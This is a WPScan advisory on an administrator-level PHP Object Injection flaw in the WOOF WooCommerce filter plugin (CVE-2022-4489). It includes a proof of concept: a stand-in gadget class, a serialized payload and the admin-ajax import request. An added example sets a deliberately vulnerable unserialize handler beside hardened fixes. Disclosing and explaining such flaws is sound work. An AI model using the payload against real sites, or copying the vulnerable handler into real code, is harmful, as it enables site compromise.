WPScan

WordPress Plugin Vulnerabilities

WOOF - Products Filter for WooCommerce < 1.3.2 - Admin+ PHP Object Injection

Description

The plugin passes user input supplied through its settings to unserialize(), which could allow high-privilege users such as administrators to perform PHP Object Injection when a suitable gadget chain is present on the site.

Proof of Concept

1. To simulate a gadget chain, put the following code in a plugin (the class only needs to exist in the autoloaded/plugin code so that unserialize() can instantiate it):

<?php
// Stand-in gadget: __wakeup() runs as soon as an instance is unserialized
class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

2. Enable the Import/Export extension: WooCommerce > Settings > Products Filter > Extensions > tick the "Import/Export" box > Save changes (requires the "WooCommerce" plugin to be active).

3. Use the "Export/Import" function in WooCommerce > Settings > Products Filter > Advanced > Export/Import, and enter the following content: {"evil":"O:4:\"Evil\":0:{}"}

4. Click "Import placed data" and confirm with "OK". The "Arbitrary deserialization" message is displayed, showing that __wakeup() of the injected object was executed.

POST /wp-admin/admin-ajax.php HTTP/1.1

action=woof_do_import_data&import_value=%7B%22evil%22%3A%22O%3A4%3A%5C%22Evil%5C%22%3A0%3A%7B%7D%22%7D
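To show the defender's side of this finding, here is an added example (not code from the WOOF plugin, its authors or WPScan): a hypothetical import handler that feeds decoded JSON values to unserialize(), placed beside a hardened version that never deserializes user input, plus the allowed_classes fallback for legacy code paths that cannot drop unserialize() immediately. The function names (woof_import_vulnerable, woof_import_hardened, safe_unserialize) and the handler's internal structure are assumptions; the payload is the one from the proof of concept above.

```php
<?php
// Added example, not the plugin's code. Function names and structure are
// hypothetical; only the payload format comes from the advisory.

// Gadget stand-in, identical to the PoC class above.
class Evil {
    public function __wakeup(): void {
        die("Arbitrary deserialization");
    }
}

// Constructed sample payload: the import_value from the PoC request.
$import_value = '{"evil":"O:4:\"Evil\":0:{}"}';

// VULNERABLE PATTERN: every string inside the decoded JSON is handed to
// unserialize(), so any loaded class with a magic method (__wakeup,
// __destruct, __toString, ...) becomes reachable by whoever controls the import.
function woof_import_vulnerable(string $json): array {
    $data = json_decode($json, true);
    $settings = [];
    foreach ((array) $data as $key => $value) {
        // PHP Object Injection sink
        $settings[$key] = is_string($value) ? unserialize($value) : $value;
    }
    return $settings;
}

// HARDENED PATTERN: user-controlled data never reaches unserialize().
// Structured settings travel as JSON only; strings that look like
// serialized PHP are rejected so they cannot reach an older code path later.
function woof_import_hardened(string $json): array {
    $data = json_decode($json, true, 8, JSON_THROW_ON_ERROR);
    if (!is_array($data)) {
        throw new InvalidArgumentException('Import must be a JSON object');
    }
    $settings = [];
    foreach ($data as $key => $value) {
        if (is_string($value) && preg_match('/^[OC]:\d+:"/', $value)) {
            throw new InvalidArgumentException("Serialized object rejected for key '$key'");
        }
        $settings[$key] = $value;
    }
    return $settings;
}

// DEFENCE IN DEPTH where unserialize() must stay for now:
// allowed_classes => false turns any object into __PHP_Incomplete_Class and
// never invokes __wakeup() or other magic methods of the original class.
function safe_unserialize(string $value): mixed {
    return unserialize($value, ['allowed_classes' => false]);
}

try {
    woof_import_hardened($import_value);
} catch (InvalidArgumentException $e) {
    echo "Rejected: " . $e->getMessage() . PHP_EOL;
}

$r = safe_unserialize('O:4:"Evil":0:{}');
var_dump($r instanceof __PHP_Incomplete_Class); // true, and __wakeup() did not run

// Running the vulnerable handler on the same payload terminates the script
// with "Arbitrary deserialization", exactly as the PoC describes.
woof_import_vulnerable($import_value);
```

The regular-expression check in the hardened handler is deliberately a secondary control: the primary fix is that no code path calls unserialize() on the import at all, which also removes the class of bypasses (objects nested inside serialized arrays) that a string prefix check alone would miss.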


Affects Plugins

woocommerce-products-filter
Fixed in version 1.3.2

References

CVE
CVE-2022-4489

Classification

Type

OBJECT INJECTION

OWASP top 10
A8: Insecure Deserialization
CWE
CWE-502

Miscellaneous

Original Researcher

thinhnguyen1337

Submitter

thinhnguyen1337

Submitter twitter
thinhnd01
Verified

Yes

WPVDB ID
067573f2-b1e6-49a9-8c5b-f91e3b9d722f

Timeline

Publicly Published

2023-01-11 (about 2 months ago)

Added

2023-01-11 (about 2 months ago)

Last Updated

2023-01-11 (about 2 months ago)
